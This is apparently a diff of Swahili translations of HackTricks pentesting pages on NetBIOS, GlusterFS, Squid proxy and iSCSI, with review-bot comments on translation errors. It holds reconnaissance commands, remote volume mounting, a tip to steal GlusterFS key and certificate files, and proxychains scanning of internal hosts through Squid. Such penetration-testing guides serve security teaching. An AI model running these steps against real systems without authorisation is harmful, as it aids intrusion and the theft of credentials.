[From Wikidepia](https://en.wikipedia.org/wiki/NetBIOS_over_TCP/IP):
* Huduma ya jina kwa usajili na ufumbuzi wa majina (bandari: 137/udp na 137/tcp).
* Huduma ya usambazaji wa datagram kwa mawasiliano yasiyo na uhusiano (bandari: 138/udp).
* Huduma ya kikao kwa mawasiliano yenye uhusiano (bandari: 139/tcp).
* Huduma ya jina kwa usajili wa majina na ufumbuzi (bandari: 137/udp na 137/tcp).
* Huduma ya usambazaji wa datagram kwa mawasiliano yasiyo na muunganisho (bandari: 138/udp).
* Huduma ya kikao kwa mawasiliano yenye muunganisho (bandari: 139/tcp).
### Huduma ya Jina
### Name Service
Ili kifaa kiweze kushiriki katika mtandao wa NetBIOS, lazima kiwe na jina la kipekee. Hii inafanikishwa kupitia **mchakato wa matangazo** ambapo pakiti ya "Utafutaji wa Jina" inatumwa. Ikiwa hakuna pingamizi zinazopokelewa, jina linachukuliwa kuwa lipo. Vinginevyo, **seva ya Huduma ya Jina** inaweza kuulizwa moja kwa moja ili kuthibitisha upatikanaji wa jina au kufumbua jina kuwa anwani ya IP. Zana kama `nmblookup`, `nbtscan`, na `nmap` hutumiwa kwa ajili ya kuhesabu huduma za NetBIOS, kufichua majina ya seva na anwani za MAC.
Ili kifaa kiweze kushiriki katika mtandao wa NetBIOS, lazima kiwe na jina la kipekee. Hii inapatikana kupitia **mchakato wa matangazo** ambapo pakiti ya "Name Query" inatumwa. Ikiwa hakuna pingamizi zinazopokelewa, jina linaonekana kuwa linapatikana. Vinginevyo, **seva ya Huduma ya Jina** inaweza kuulizwa moja kwa moja ili kuangalia upatikanaji wa jina au kutatua jina kuwa anwani ya IP. Zana kama `nmblookup`, `nbtscan`, na `nmap` zinatumika kwa kuorodhesha huduma za NetBIOS, zikifunua majina ya seva na anwani za MAC.
```bash
PORT STATE SERVICE VERSION
137/udp open netbios-ns Samba nmbd netbios-ns (workgroup: WORKGROUP)
```
Kwa kuchunguza huduma ya NetBIOS, unaweza kupata majina ambayo seva inatumia na anwani ya MAC ya seva.
Kuhesabu huduma ya NetBIOS unaweza kupata majina ambayo seva inatumia na anwani ya MAC ya seva.
```bash
nmblookup -A <IP>
nbtscan <IP>/30
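Review bot: the `Wikidepia` typo in `[From Wikidepia](https://en.wikipedia.org/wiki/NetBIOS_over_TCP/IP)` is carried over from the removed line; fix it to `Wikipedia` (the URL is already right). `Kuhesabu huduma ya NetBIOS unaweza kupata majina...` is missing the leading `Kwa` (`Kwa kuhesabu huduma ya NetBIOS unaweza kupata...`), and the headings `## NetBios Name Service` and `### Name Service` are left in English on an otherwise Swahili page.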
@ -39,23 +40,23 @@ sudo nmap -sU -sV -T4 --script nbstat.nse -p137 -Pn -n <IP>
```
### Huduma ya Usambazaji wa Datagram
Datagram za NetBIOS zinaruhusu mawasiliano bila kuunganisha kupitia UDP, zikisaidia ujumbe wa moja kwa moja au utangazaji kwa majina yote ya mtandao. Huduma hii hutumia bandari **138/udp**.
NetBIOS datagrams huruhusu mawasiliano yasiyo na muunganiko kupitia UDP, ikisaidia ujumbe wa moja kwa moja au matangazo kwa majina yote ya mtandao. Huduma hii inatumia bandari **138/udp**.
```bash
PORT STATE SERVICE VERSION
138/udp open|filtered netbios-dgm
```
### Huduma ya Kikao
Kwa mwingiliano unaotegemea uhusiano, **Huduma ya Kikao** inawezesha mazungumzo kati ya vifaa viwili, ikifaidika na uhusiano wa **TCP** kupitia bandari **139/tcp**. Kikao kinaanza na pakiti ya "Ombi la Kikao" na kinaweza kuanzishwa kulingana na jibu. Huduma hii inasaidia ujumbe mkubwa, ugunduzi wa makosa, na urejeshaji, na TCP inashughulikia udhibiti wa mtiririko na kutuma upya pakiti.
Kwa mwingiliano unaotegemea muunganisho, **Huduma ya Kikao** inarahisisha mazungumzo kati ya vifaa viwili, ikitumia **TCP** kupitia bandari **139/tcp**. Kikao kinaanza na pakiti ya "Ombi la Kikao" na kinaweza kuanzishwa kulingana na jibu. Huduma hii inasaidia ujumbe wakubwa, kugundua makosa, na urejeleaji, huku TCP ikishughulikia udhibiti wa mtiririko na urejeleaji wa pakiti.
Uhamishaji wa data ndani ya kikao unahusisha pakiti za **Ujumbe wa Kikao**, na kikao kinakamilishwa kwa kufunga uhusiano wa TCP.
Uhamasishaji wa data ndani ya kikao unahusisha **Pakiti za Ujumbe wa Kikao**, ambapo vikao vinamalizika kwa kufunga muunganisho wa TCP.
Huduma hizi ni sehemu muhimu ya utendaji wa **NetBIOS**, kuruhusu mawasiliano yenye ufanisi na ushirikiano wa rasilimali kwenye mtandao. Kwa habari zaidi juu ya itifaki za TCP na IP, tafadhali rejea kurasa zao za [TCP Wikipedia](https://en.wikipedia.org/wiki/Transmission_Control_Protocol) na [IP Wikipedia](https://en.wikipedia.org/wiki/Internet_Protocol).
Huduma hizi ni muhimu kwa utendaji wa **NetBIOS**, zikihakikisha mawasiliano bora na ushirikiano wa rasilimali katika mtandao. Kwa maelezo zaidi kuhusu protokali za TCP na IP, rejelea kurasa zao za [TCP Wikipedia](https://en.wikipedia.org/wiki/Transmission_Control_Protocol) na [IP Wikipedia](https://en.wikipedia.org/wiki/Internet_Protocol).
```bash
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
```
**Soma ukurasa ufuatao ili kujifunza jinsi ya kuchanganua huduma hii:**
**Soma ukurasa ujao kujifunza jinsi ya kuhesabu huduma hii:**
{% content-ref url="137-138-139-pentesting-netbios.md" %}
[137-138-139-pentesting-netbios.md](137-138-139-pentesting-netbios.md)
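Review bot: three wording regressions in this hunk: `muunganiko` in `mawasiliano yasiyo na muunganiko` should be `muunganisho`; `Uhamasishaji wa data` means mobilisation/sensitisation, whereas the replaced `Uhamishaji wa data` (transfer) was correct; and `urejeleaji wa pakiti` reads as "referencing packets", while the replaced `kutuma upya pakiti` correctly rendered TCP retransmission. Separately, the unchanged `{% content-ref url="137-138-139-pentesting-netbios.md" %}` that follows "read the next page" points at a file named like this page itself; confirm it is meant to link onward rather than back to this page.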
@ -84,16 +85,17 @@ Name: Find Names
Description: Three scans to find the names of the server
Command: nmblookup -A {IP} &&&& nbtscan {IP}/30 &&&& nmap -sU -sV -T4 --script nbstat.nse -p 137 -Pn -n {IP}
```
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana katika HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}

View file

@ -1,61 +1,47 @@
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
# Taarifa Msingi
# Basic Information
**GlusterFS** ni **mfumo wa faili uliosambazwa** ambao unachanganya uhifadhi kutoka kwenye seva nyingi kuwa **mfumo mmoja uliojumuishwa**. Inaruhusu **ukubwa usio na kikomo**, maana unaweza kuongeza au kuondoa seva za uhifadhi bila kuvuruga mfumo mzima wa faili. Hii inahakikisha **upatikanaji wa juu** na **uvumilivu wa hitilafu** kwa data yako. Kwa kutumia GlusterFS, unaweza kufikia faili zako kama vile zimehifadhiwa kwenye eneo lako, bila kujali miundombinu ya seva iliyo chini. Inatoa suluhisho lenye nguvu na linaweza kubadilika kwa usimamizi wa kiasi kikubwa cha data kwenye seva nyingi.
**GlusterFS** ni **mfumo wa faili ulio sambazwa** unaounganisha uhifadhi kutoka kwa seva nyingi katika **mfumo mmoja**. Inaruhusu **upanuzi wa kiholela**, ikimaanisha unaweza kuongeza au kuondoa seva za uhifadhi kwa urahisi bila kuathiri mfumo wa faili kwa ujumla. Hii inahakikisha **upatikanaji** wa juu na **uvumilivu wa makosa** kwa data yako. Pamoja na GlusterFS, unaweza kufikia faili zako kana kwamba zimehifadhiwa kwa ndani, bila kujali miundombinu ya seva inayotumika. Inatoa suluhisho lenye nguvu na linaloweza kubadilika kwa usimamizi wa kiasi kikubwa cha data katika seva nyingi.
**Bandari za chaguo-msingi**: 24007/tcp/udp, 24008/tcp/udp, 49152/tcp (na zaidi)\
Kwa bandari 49152, bandari zilizoongezeka kwa 1 zinahitaji kuwa wazi ili kutumia bricks zaidi. _Awali bandari 24009 ilikuwa inatumika badala ya 49152._
**Bandari za kawaida**: 24007/tcp/udp, 24008/tcp/udp, 49152/tcp (kuanzia)\
Kwa bandari 49152, bandari zinazoongezeka kwa 1 zinahitaji kuwa wazi ili kutumia zaidi ya bricks. _Awali bandari 24009 ilitumika badala ya 49152._
```
PORT STATE SERVICE
24007/tcp open rpcbind
49152/tcp open ssl/unknown
```
## Uchambuzi
## Enumeration
Ili kuingiliana na mfumo huu wa faili, unahitaji kusakinisha [**Mteja wa GlusterFS**](https://download.gluster.org/pub/gluster/glusterfs/LATEST/) (`sudo apt-get install glusterfs-cli`).
Ili kuingiliana na mfumo huu wa faili unahitaji kufunga [**GlusterFS client**](https://download.gluster.org/pub/gluster/glusterfs/LATEST/) (`sudo apt-get install glusterfs-cli`).
Kutaja na kufunga voli zilizopo, unaweza kutumia:
Ili kuorodhesha na kuunganisha kiasi kilichopo unaweza kutumia:
```bash
sudo gluster --remote-host=10.10.11.131 volume list
# This will return the name of the volumes
sudo mount -t glusterfs 10.10.11.131:/<vol_name> /mnt/
```
Ikiwa unapokea **kosa wakati wa kufunga mfumo wa faili**, unaweza kuangalia magogo katika `/var/log/glusterfs/`
Ikiwa unapokea **kosa la kujaribu kuunganisha mfumo wa faili**, unaweza kuangalia kumbukumbu katika `/var/log/glusterfs/`
**Makosa yanayotaja vyeti** yanaweza kusuluhishwa kwa kuiba faili (ikiwa una ufikiaji kwenye mfumo):
**Makosa yanayohusisha vyeti** yanaweza kutatuliwa kwa kuiba faili (ikiwa una ufikiaji wa mfumo):
* /etc/ssl/glusterfs.ca
* /etc/ssl/glusterfs.key
* /etc/ssl/glusterfs.ca.pem
Na kuzihifadhi kwenye kifaa chako katika saraka ya `/etc/ssl` au `/usr/lib/ssl` (ikiwa saraka tofauti inatumika, angalia mistari kama "_could not load our cert at /usr/lib/ssl/glusterfs.pem_" katika magogo).
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
Na kuyahifadhi katika mashine yako `/etc/ssl` au `/usr/lib/ssl` directory (ikiwa directory tofauti inatumika angalia mistari inayofanana na: "_could not load our cert at /usr/lib/ssl/glusterfs.pem_" katika kumbukumbu) .
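Review bot: this hunk covers the whole file (`-1,61 +1,47`) and removes the closing support banner (the trailing `<details>...</details>` block) without adding the `{% hint style="success" %}` footer that every other page in this commit gets; add it after the final paragraph. Also `Ili kuorodhesha na kuunganisha kiasi kilichopo` renders "volumes" as `kiasi` (quantity), where the replaced line's `voli zilizopo` matched the `gluster ... volume list` command below, and `Bandari za kawaida` has the same "usual" versus "default" problem noted on the NDMP file.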

View file

@ -1,62 +1,64 @@
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
# Taarifa Msingi
# Basic Information
Kutoka [Wikipedia](https://en.wikipedia.org/wiki/Squid\_\(software\)):
From [Wikipedia](https://en.wikipedia.org/wiki/Squid\_\(software\)):
> **Squid** ni kache na mbele ya mtandao wa proksi wa HTTP. Ina matumizi mbalimbali, ikiwa ni pamoja na kuharakisha seva ya wavuti kwa kuhifadhi ombi zilizorudiwa, kuhifadhi wavuti, DNS na utafutaji mwingine wa mtandao wa kompyuta kwa kikundi cha watu wanaoshiriki rasilimali za mtandao, na kusaidia usalama kwa kufuta trafiki. Ingawa hutumiwa hasa kwa HTTP na FTP, Squid ina msaada mdogo kwa itifaki kadhaa zingine ikiwa ni pamoja na Internet Gopher, SSL, TLS na HTTPS. Squid haisaidii itifaki ya SOCKS, tofauti na Privoxy, ambayo Squid inaweza kutumika ili kutoa msaada wa SOCKS.
> **Squid** ni proxy ya wavuti ya HTTP inayohifadhi na kupeleka. Ina matumizi mbalimbali, ikiwa ni pamoja na kuongeza kasi ya seva ya wavuti kwa kuhifadhi maombi yanayorudiwa, kuhifadhi wavuti, DNS na utafutaji mwingine wa mtandao wa kompyuta kwa kundi la watu wanaoshiriki rasilimali za mtandao, na kusaidia usalama kwa kuchuja trafiki. Ingawa inatumika hasa kwa HTTP na FTP, Squid ina msaada mdogo kwa protokali nyingine kadhaa ikiwa ni pamoja na Internet Gopher, SSL, TLS na HTTPS. Squid haisaidii protokali ya SOCKS, tofauti na Privoxy, ambayo Squid inaweza kutumika ili kutoa msaada wa SOCKS.
**Bandari ya msingi:** 3128
**Default port:** 3128
```
PORT STATE SERVICE VERSION
3128/tcp open http-proxy Squid http proxy 4.11
```
# Uchambuzi
# Enumeration
## Mtandao wa Proksi
## Web Proxy
Unaweza kujaribu kuweka huduma hii uliyoigundua kama proksi kwenye kivinjari chako. Hata hivyo, ikiwa imeboreshwa na uthibitishaji wa HTTP utaulizwa majina ya watumiaji na nywila.
Unaweza kujaribu kuweka huduma hii iliyogunduliwa kama proxy kwenye kivinjari chako. Hata hivyo, ikiwa imewekwa na uthibitisho wa HTTP, utaombwa kwa majina ya watumiaji na nywila.
```bash
# Try to proxify curl
curl --proxy http://10.10.11.131:3128 http://10.10.11.131
```
## Nmap imefanyiwa proxi
## Nmap proxified
Unaweza pia jaribu kutumia proxi kufanya **uchunguzi wa bandari za ndani kwa kutumia nmap**.\
Sanidi proxychains kutumia proxi ya squid kwa kuongeza mstari ufuatao mwishoni mwa faili ya proxichains.conf: `http 10.10.10.10 3128`
Kwa proxi zinazohitaji uwakiki, ongeza siri kwenye usanidi kwa kuingiza jina la mtumiaji na nywila mwishoni: `http 10.10.10.10 3128 jina_la_mtumiaji nywila`.
You can also try to abuse the proxy to **scan internal ports proxifying nmap**.\
Configure proxychains to use the squid proxy adding he following line at the end of the proxichains.conf file: `http 10.10.10.10 3128`\
Kwa proxies zinazohitaji uthibitisho, ongeza taarifa za kuingia kwenye usanidi kwa kujumuisha jina la mtumiaji na nenosiri mwishoni: `http 10.10.10.10 3128 username passw0rd`.
Kisha endesha nmap kwa kutumia proxychains kufanya **uchunguzi wa mwenyeji kutoka kwa eneo la ndani**: `proxychains nmap -sT -n -p- localhost`
Then run nmap with proxychains to **scan the host from local**: `proxychains nmap -sT -n -p- localhost`
## SPOSE Scanner
Kwa upande mwingine, Skana ya Bandari Zilizofunguliwa za Squid Pivoting ([spose.py](https://github.com/aancw/spose)) inaweza kutumika.
Alternatively, the Squid Pivoting Open Port Scanner ([spose.py](https://github.com/aancw/spose)) can be used.
```bash
python spose.py --proxy http://10.10.11.131:3128 --target 10.10.11.131
```
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}
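Review bot: the Squid page ends up half-translated. The headings `# Basic Information`, `## Enumeration`, `## Web Proxy` and `## Nmap proxified` and the sentences `You can also try to abuse the proxy to **scan internal ports proxifying nmap**.` and `Then run nmap with proxychains to **scan the host from local**` are in English, while the body text next to them (`Unaweza kujaribu kuweka huduma hii iliyogunduliwa kama proxy kwenye kivinjari chako…`, `Kwa proxies zinazohitaji uthibitisho…`) is Swahili; pick one language for the page. Separately, `Configure proxychains to use the squid proxy adding he following line at the end of the proxichains.conf file` has a typo (`he` should be `the`) and names the wrong file: the proxychains configuration file is `proxychains.conf`, not `proxichains.conf`.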


@ -1,143 +1,92 @@
# 3260 - Pentesting ISCSI
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## Taarifa Msingi
## Basic Information
Kutoka [Wikipedia](https://en.wikipedia.org/wiki/ISCSI):
From [Wikipedia](https://en.wikipedia.org/wiki/ISCSI):
> Katika kompyuta, **iSCSI** ni kifupi cha **Internet Small Computer Systems Interface**, kiwango cha mtandao wa uhifadhi wa data kwa msingi wa Itifaki ya Mtandao wa Itifaki (IP) kwa ajili ya kuunganisha vituo vya uhifadhi wa data. Inatoa ufikiaji wa ngazi ya block kwa vifaa vya uhifadhi kwa kubeba amri za SCSI juu ya mtandao wa TCP/IP. iSCSI hutumiwa kurahisisha uhamisho wa data juu ya mitandao ya ndani na kusimamia uhifadhi kwa umbali mrefu. Inaweza kutumika kuhamisha data juu ya mitandao ya eneo la ndani (LANs), mitandao ya eneo kubwa (WANs), au Mtandao na inaweza kuwezesha uhifadhi na upatikanaji wa data usio na kikomo kwa eneo.
> In computing, **iSCSI** ni kifupi cha **Internet Small Computer Systems Interface**, kiwango cha mtandao wa kuhifadhi data kilichotegemea Itifaki ya Mtandao (IP) kwa ajili ya kuunganisha vituo vya kuhifadhi data. Inatoa ufikiaji wa kiwango cha block kwa vifaa vya kuhifadhi kwa kubeba amri za SCSI kupitia mtandao wa TCP/IP. iSCSI inatumika kuwezesha uhamishaji wa data kupitia intraneti na kusimamia uhifadhi kwa umbali mrefu. Inaweza kutumika kuhamasisha data kupitia mitandao ya eneo la ndani (LAN), mitandao ya eneo pana (WAN), au Mtandao na inaweza kuwezesha uhifadhi na upatikanaji wa data bila kujali eneo.
>
> Itifaki hii inaruhusu wateja (inayoitwa initiators) kutuma amri za SCSI (CDBs) kwa vifaa vya uhifadhi (malengo) kwenye seva za mbali. Ni itifaki ya mtandao wa eneo la uhifadhi (SAN), kuruhusu shirika kuunganisha uhifadhi katika safu za uhifadhi wakati inatoa wateja (kama vile seva za database na wavuti) na hisia ya diski za SCSI zilizounganishwa kwa eneo. Inashindana sana na Fibre Channel, lakini tofauti na Fibre Channel ya jadi ambayo kawaida inahitaji nyaya maalum, iSCSI inaweza kukimbia kwa umbali mrefu kwa kutumia miundombinu ya mtandao iliyopo.
> Itifaki hii inaruhusu wateja (wanaoitwa waanzilishi) kutuma amri za SCSI (CDBs) kwa vifaa vya kuhifadhi (malengo) kwenye seva za mbali. Ni itifaki ya mtandao wa eneo la kuhifadhi (SAN), ikiruhusu mashirika kuunganisha uhifadhi katika mfululizo wa kuhifadhi huku ikitoa wateja (kama vile seva za database na wavuti) hisia ya diski za SCSI zilizounganishwa kwa ndani. Inashindana hasa na Fibre Channel, lakini tofauti na Fibre Channel ya jadi ambayo kawaida inahitaji nyaya maalum, iSCSI inaweza kuendeshwa kwa umbali mrefu kwa kutumia miundombinu ya mtandao iliyopo.
**Bandari ya chaguo-msingi:** 3260
**Default port:** 3260
```
PORT STATE SERVICE VERSION
